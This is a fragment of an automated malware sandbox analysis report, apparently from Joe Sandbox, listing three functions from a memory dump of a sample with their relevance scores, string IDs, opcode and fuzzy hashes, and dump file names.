                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2125118731
                                                                                                                • Opcode ID: 718afa2b1041b248eb888348cf7bc05b4db11cc7a267350731f9086d0cb02329
                                                                                                                • Instruction ID: 7e2eaada978b7d8a1896b89297bb31814c6ddfdf73e8f0510fcdb7da112ab105
                                                                                                                • Opcode Fuzzy Hash: 718afa2b1041b248eb888348cf7bc05b4db11cc7a267350731f9086d0cb02329
                                                                                                                • Instruction Fuzzy Hash: 68B14E30A1130A8FDB54DFA9D59466EBBB6FF84304F248829D406EB395DB35DD86CB80
                                                                                                                Function 06CA8840 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LR^q$LR^q$$^q$$^q
                                                                                                                • API String ID: 0-2454687669
                                                                                                                • Opcode ID: 9f5f89ec6530ad6d46263e7666778a5f9e07ac820a2edaf2091ad6d9d1aa9f4d
                                                                                                                • Instruction ID: cd99cebddcab9b7343437a03197de029795660a935fc91dac109eb31ec4ec469
                                                                                                                • Opcode Fuzzy Hash: 9f5f89ec6530ad6d46263e7666778a5f9e07ac820a2edaf2091ad6d9d1aa9f4d
                                                                                                                • Instruction Fuzzy Hash: 3751B131B013069FDB58EF79D954A6AB7E6FF84304B10856DE405EB3A9DA30EC45CB90
                                                                                                                Function 06CABA68 Relevance: 5.0, Strings: 4, Instructions: 40COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2125118731
                                                                                                                • Opcode ID: 027dce95b3f900d996189c0e6a10a9a262eefd3f0fd890464ca9fd7a1a5428dc
                                                                                                                • Instruction ID: f72d82882100821989d9bfb580feac74d2962e0a8dd98b31f5565352edbeb630
                                                                                                                • Opcode Fuzzy Hash: 027dce95b3f900d996189c0e6a10a9a262eefd3f0fd890464ca9fd7a1a5428dc
                                                                                                                • Instruction Fuzzy Hash: 40F0C230F102191BCF689A38D864A6E7BAADB85304F20453DD406EB348EA61DC0687C1